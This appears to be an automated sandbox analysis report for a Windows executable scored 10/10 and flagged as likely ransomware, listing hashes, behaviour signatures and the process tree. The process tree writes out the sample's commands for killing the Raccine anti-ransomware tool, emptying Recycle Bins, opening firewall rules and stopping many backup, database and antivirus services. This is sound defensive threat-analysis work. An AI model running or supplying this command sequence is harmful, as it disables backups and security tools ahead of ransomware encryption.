Analysis
-
max time kernel
150s -
max time network
13s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
23-03-2021 18:12
General
-
Target
936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
-
Size
296KB
-
MD5
6b2c7d5298c7fb8f4c4c3531894a91c1
-
SHA1
d7333af03603b27566ac8ab63d6aa21575e1ebb4
-
SHA256
936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd
-
SHA512
2555a572e9088ce58dce5bcaf1c0fca76727b6a1e1315ec0dbfe588a796faf1d083cb6ff3a6362f7c8075a4f321228c6227db7a3207fa557fff68e9fd4a3e114
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 1 TTPs
-
Windows security modification 2 TTPs 1 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe"C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe"1⤵
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1196932482-1743097297-13950492591024355309121304237114933859451739492094-740195237"1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
4KB